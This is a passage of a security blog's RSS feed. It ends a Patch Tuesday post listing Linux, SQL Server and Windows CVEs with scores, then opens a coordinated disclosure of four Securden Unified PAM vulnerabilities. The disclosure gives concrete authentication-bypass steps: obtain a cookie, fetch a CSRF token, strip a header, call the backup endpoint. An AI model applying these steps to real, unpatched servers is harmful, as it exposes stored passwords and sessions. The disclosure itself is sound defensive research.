href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39676">CVE-2025-39676</a></td><td><p>scsi: qla4xxx: Prevent a potential error pointer dereference</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39726">CVE-2025-39726</a></td><td><p>s390/ism: fix concurrency management in ism_cmd()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38704">CVE-2025-38704</a></td><td><p>rcu/nocb: Fix possible invalid rdp's-&gt;nocb_cb_kthread pointer access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39715">CVE-2025-39715</a></td><td><p>parisc: Revise gateway LWS calls to probe user read access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39716">CVE-2025-39716</a></td><td><p>parisc: Revise __get_user() to probe user read access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38691">CVE-2025-38691</a></td><td><p>pNFS: Fix uninited ptr deref in block/scsi layout</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38721">CVE-2025-38721</a></td><td><p>netfilter: ctnetlink: fix refcount leak on table dump</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38725">CVE-2025-38725</a></td><td><p>net: usb: asix_devices: add phy_mask for ax88772 mdio bus</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38736">CVE-2025-38736</a></td><td><p>net: usb: asix_devices: Fix PHY address mask in MDIO bus initialization</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38717">CVE-2025-38717</a></td><td><p>net: kcm: Fix race condition in kcm_unattach()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38734">CVE-2025-38734</a></td><td><p>net/smc: fix UAF on smcsk after smc_listen_out()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38681">CVE-2025-38681</a></td><td><p>mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39709">CVE-2025-39709</a></td><td><p>media: venus: protect against spurious interrupts during probe</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38679">CVE-2025-38679</a></td><td><p>media: venus: Fix OOB read due to missing payload bound check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39714">CVE-2025-39714</a></td><td><p>media: usbtv: Lock resolution while streaming</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39720">CVE-2025-39720</a></td><td><p>ksmbd: fix refcount leak causing resource not released</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38730">CVE-2025-38730</a></td><td><p>io_uring/net: commit partial buffers on retry</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39687">CVE-2025-39687</a></td><td><p>iio: light: as73211: Ensure buffer holes are zeroed</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39719">CVE-2025-39719</a></td><td><p>iio: imu: bno055: fix OOB access of hw_xlate array</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38712">CVE-2025-38712</a></td><td><p>hfsplus: don't use BUG_ON() in hfsplus_create_attributes_file()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38715">CVE-2025-38715</a></td><td><p>hfs: fix slab-out-of-bounds in hfs_bnode_read()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38716">CVE-2025-38716</a></td><td><p>hfs: fix general protection fault in hfs_find_init()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38722">CVE-2025-38722</a></td><td><p>habanalabs: fix UAF in export_dmabuf()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38707">CVE-2025-38707</a></td><td><p>fs/ntfs3: Add sanity check for file name</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39731">CVE-2025-39731</a></td><td><p>f2fs: vm_unmap_ram() may be called from an invalid context</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39679">CVE-2025-39679</a></td><td><p>drm/nouveau/nvif: Fix potential memory leak in nvif_vmm_ctor().</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39706">CVE-2025-39706</a></td><td><p>drm/amdkfd: Destroy KFD debugfs after destroy KFD wq</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39707">CVE-2025-39707</a></td><td><p>drm/amdgpu: check if hubbub is NULL in debugfs/amdgpu_dm_capabilities</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38705">CVE-2025-38705</a></td><td><p>drm/amd/pm: fix null pointer access</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39705">CVE-2025-39705</a></td><td><p>drm/amd/display: fix a Null pointer dereference vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39693">CVE-2025-39693</a></td><td><p>drm/amd/display: Avoid a NULL pointer dereference</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39675">CVE-2025-39675</a></td><td><p>drm/amd/display: Add null pointer check in mod_hdcp_hdcp1_create_session()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39685">CVE-2025-39685</a></td><td><p>comedi: pcl726: Prevent invalid irq number</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38687">CVE-2025-38687</a></td><td><p>comedi: fix race between polling and detaching</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39686">CVE-2025-39686</a></td><td><p>comedi: Make insn_rw_emulate_bits() do insn-&gt;n samples</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39684">CVE-2025-39684</a></td><td><p>comedi: Fix use of uninitialized memory in do_insn_ioctl() and do_insnlist_ioctl()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39697">CVE-2025-39697</a></td><td><p>NFS: Fix a race when updating an existing write</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38696">CVE-2025-38696</a></td><td><p>MIPS: Don't crash in stack_top() for tasks without ABI or vDSO</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38723">CVE-2025-38723</a></td><td><p>LoongArch: BPF: Fix jump offset calculation in tailcall</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38700">CVE-2025-38700</a></td><td><p>scsi: libiscsi: Initialize iscsi_conn-&gt;dd_data only if memory is allocated</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38706">CVE-2025-38706</a></td><td><p>ASoC: core: Check for rtd == NULL in snd_soc_remove_pcm_runtime()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-7039">CVE-2025-7039</a></td><td><p>Glib: buffer under-read on glib through glib/gfileutils.c via get_tmp_file()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-38680">CVE-2025-38680</a></td><td><p>media: uvcvideo: Fix 1-byte out-of-bounds read in uvc_parse_format()</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39710">CVE-2025-39710</a></td><td><p>media: venus: Add a check for packet size after reading from shared memory</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-39701">CVE-2025-39701</a></td><td><p>ACPI: pfr_update: Fix the driver update version check</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55227">CVE-2025-55227</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47997">CVE-2025-47997</a></td><td><p>Microsoft SQL Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-21907">CVE-2024-21907</a></td><td><p>VulnCheck: CVE-2024-21907 Improper Handling of Exceptional Conditions in Newtonsoft.Json</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54111">CVE-2025-54111</a></td><td><p>Windows UI XAML Phone DatePickerFlyout Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54913">CVE-2025-54913</a></td><td><p>Windows UI XAML Maps MapControlSettings Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55224">CVE-2025-55224</a></td><td><p>Windows Hyper-V Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54092">CVE-2025-54092</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55228">CVE-2025-55228</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53800">CVE-2025-53800</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54102">CVE-2025-54102</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53801">CVE-2025-53801</a></td><td><p>Microsoft DWM Core Library Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54919">CVE-2025-54919</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53805">CVE-2025-53805</a></td><td><p>HTTP.sys Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54103">CVE-2025-54103</a></td><td><p>Windows Management Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54116">CVE-2025-54116</a></td><td><p>Windows MultiPoint Services Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55236">CVE-2025-55236</a></td><td><p>Graphics Kernel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54115">CVE-2025-54115</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53807">CVE-2025-53807</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54114">CVE-2025-54114</a></td><td><p>Windows Connected Devices Platform Service (Cdpsvc) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53802">CVE-2025-53802</a></td><td><p>Windows Bluetooth Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49734">CVE-2025-49734</a></td><td><p>PowerShell Direct Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54112">CVE-2025-54112</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54105">CVE-2025-54105</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55223">CVE-2025-55223</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54108">CVE-2025-54108</a></td><td><p>Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53809">CVE-2025-53809</a></td><td><p>Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-september-2025</link>
      <guid isPermaLink="false">blt8eec20c33ef90ebf</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 09 Sep 2025 20:45:52 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Securden Unified PAM: Multiple Critical Vulnerabilities (FIXED)]]></title>
      <description><![CDATA[<h2><span style='font-size: undefined;'>Overview</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>While performing continuous </span><a href="/fundamentals/what-is-a-red-team/" target="_self"><span style='font-size: undefined;'>red teaming</span></a><span style='font-size: undefined;'> exercises through Rapid7’s </span><a href="https://www.rapid7.com/services/continuous-red-team-service/"><span style='font-size: undefined;'>Vector Command</span></a><span style='font-size: undefined;'> service, Rapid7 discovered a total of four vulnerabilities in </span><a href="https://www.securden.com/privileged-account-manager/index.html"><span style='font-size: undefined;'>Securden Unified PAM</span></a><span style='font-size: undefined;'>. Three vulnerabilities were identified that allow an attacker to bypass authentication and view stored passwords or execute system commands on the server. The fourth identified vulnerability allows a malicious actor to access Securden’s gateway portal with low privileges, which could potentially be leveraged to exploit other customers running Securden Unified PAM. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Securden effectively coordinated with Rapid7 and quickly provided a patch to remediate all four vulnerabilities.</span></p><table><colgroup data-width='1250.0000000000002'><col style="width:18.18181818181818%"/><col style="width:21.159874608150467%"/><col style="width:10.501567398119121%"/><col style="width:34.48275862068965%"/><col style="width:15.673981191222566%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Vulnerability Name</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSS</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Summary</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Vendor Provided Vulnerable Versions</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Authentication Bypass</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-53118</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"><span style='font-size: undefined;'>CVSS 9.4</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>An authentication bypass vulnerability exists which allows an unauthenticated attacker to control administrator backup functions, leading to compromise of passwords, secrets, and application session tokens stored by the Unified PAM.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.0.x through 11.3.1</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Unauthenticated Unrestricted File Upload</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-53119</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"><span style='font-size: undefined;'>CVSS 7.5</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>An unauthenticated unrestricted file upload vulnerability allows an attacker to upload malicious binaries and scripts to the server.</span></p></td><td><p style="direction: ltr;">9.0.x through 11.3.1</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Path Traversal In File Upload</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-53120</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"><span style='font-size: undefined;'>CVSS 9.4</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A path traversal vulnerability in unauthenticated upload functionality allows a malicious actor to upload binaries and scripts to the server’s configuration and web root directories, achieving remote code execution on the Unified PAM server.</span></p></td><td><p style="direction: ltr;">9.0.x through 11.3.1</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Shared SSH Key and Cloud Infrastructure</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-6737</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"><span style='font-size: undefined;'>CVSS 7.2 </span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Securden’s Unified PAM Remote Vendor Gateway access portal shares infrastructure and access tokens across multiple tenants. A malicious actor can obtain authentication material and access the gateway server with low-privilege permissions.</span></p></td><td><p style="direction: ltr;">9.0.x through 11.3.1</p></td></tr></tbody></table><h2>Product description</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Securden Unified PAM can generally be described as an all-purpose server for access control. It can store, manage, and log access to credentials, as well as log when users request admin privileges. Remote access connections such as RDP and SSH can be initialized from the web application. Videos of these sessions can be recorded and saved for administrators’ review. User accounts can be integrated from Active Directory and can be managed to only have access to specific sets of credentials. For more information, visit </span><a href="https://www.securden.com/privileged-account-manager/index.html" target="_self"><span style='font-size: undefined;'>Securden’s site</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>All of this functionality related to access control makes it a prime target for malicious actors. </span></p><h2>Impact</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The first vulnerability, CVE-2025-53118, allows an attacker to bypass authentication protections to read saved credentials through access to application backup endpoints. The second vulnerability, CVE-2025-53120, allows an attacker to upload a file to any directory with any filename without authentication due to path traversal. The third vulnerability, CVE-2025-53119, allows an attacker to upload a file of any file type and any file content as a result of a lack of sufficient filetype validations. The last vulnerability, CVE-2025-6737, allows an attacker to authenticate to Securden’s gateway server with low-level permissions using shared credentials across installations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Based on testing, exploitation of CVE-2025-53119 and CVE-2025-53120 was not viable on version 9.0.1, but was viable on version 11.1.x. While an attacker can leverage any of the disclosed vulnerabilities to achieve unauthenticated </span><a href="/fundamentals/what-is-remote-code-execution-rce/" target="_self"><span style='font-size: undefined;'>remote code execution (RCE)</span></a><span style='font-size: undefined;'>, an attack performed from an authenticated context would not require the authentication bypass to gain code execution capabilities.</span></p><h2>Credit</h2><p style="direction: ltr;"><span style='font-size: undefined;'>These issues were discovered by Aaron Herndon, Principal Security Consultant, and Marcus Chang, Security Consultant, both of Rapid7. They are being disclosed in accordance with </span><a href="https://www.rapid7.com/security/disclosure/"><span style='font-size: undefined;'>Rapid7's vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2>Vendor statement</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following statement has been provided by Securden CEO, Bala Venkatramani.</span></p><blockquote><span style='font-size: undefined;'>"These vulnerabilities have been addressed in version 11.4.4 of Securden Unified PAM. At Securden, customer security is our top priority. We actively collaborate with esteemed researchers like Rapid7 to swiftly identify and remediate vulnerabilities. We appreciate the efforts of the security researchers at Rapid7 for their responsible disclosure and professionalism throughout the process. We have already sent advisories to all our customers individually.”</span></blockquote><h2>CVE-2025-53118: Authentication Bypass</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Browsing to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/thirdparty-access</span></span><span style='font-size: undefined;'> within the application will redirect the user to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/</span></span><span style='font-size: undefined;'> and assign a securdensession cookie value. This cookie can be used when requesting the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/get_csrf_token</span></span><span style='font-size: undefined;'> URL to obtain a </span><a href="https://www.rapid7.com/fundamentals/cross-site-request-forgery/"><span style='font-size: undefined;'>CSRF token</span></a><span style='font-size: undefined;'> and securdenpost cookie, which are used for POST requests. While the cookie has not yet been authorized through a valid login, Rapid7 identified several API endpoints within the application that do not check for authorization, and instead only the presence of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>securdensession</span></span><span style='font-size: undefined;'> cookie, </span><span style='font-size: undefined;'><span data-type='inlineCode'>securdenpost</span></span><span style='font-size: undefined;'> cookie, and a CSRF token generated from the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/thirdparty-access</span></span><span style='font-size: undefined;'> request.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note: </strong></em></span><span style='font-size: undefined;'><em>POST requests sent by the application typically have an </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>X-Requested-With</em></span></span><span style='font-size: undefined;'><em> header. However, if this header is present during authentication bypass requests, the server will respond with an error. Successful exploitation requires removing this header.</em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While reviewing API endpoints which are vulnerable to the authentication bypass, Rapid7 determined the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/configure_schedule</span></span><span style='font-size: undefined;'> request to have the highest impact, allowing unauthenticated users to perform the </span><a href="https://www.securden.com/privileged-access-management/help/account-management/how-to-add-and-manage-account-types-in-pam.html#offline-access"><span style='font-size: undefined;'>encrypted</span></a><span style='font-size: undefined;'> password backup functionality with their own specified password and location to drop the file. The encrypted password backup can only be performed if a </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> account is present. In the case of a </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> account not being present, an attacker could still leverage the endpoint to repeatedly perform full database backups and steal active session cookies to authenticate as logged in users.</span></p><h3><span style='font-size: undefined;'>/</span><span style='font-size: undefined;'>thirdparty-access</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 navigated to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/thirdparty-access</span></span><span style='font-size: undefined;'> and obtained a securdensession cookie:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd2eb52cf4b8382fc/68ac659f98564f5546b47f23/SD1.png" height="297" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD1.png" asset-alt="SD1.png" width="764" max-width="764" max-height="297" style="max-width: 764px; width: 764px; max-height: 297px; height: 297px" 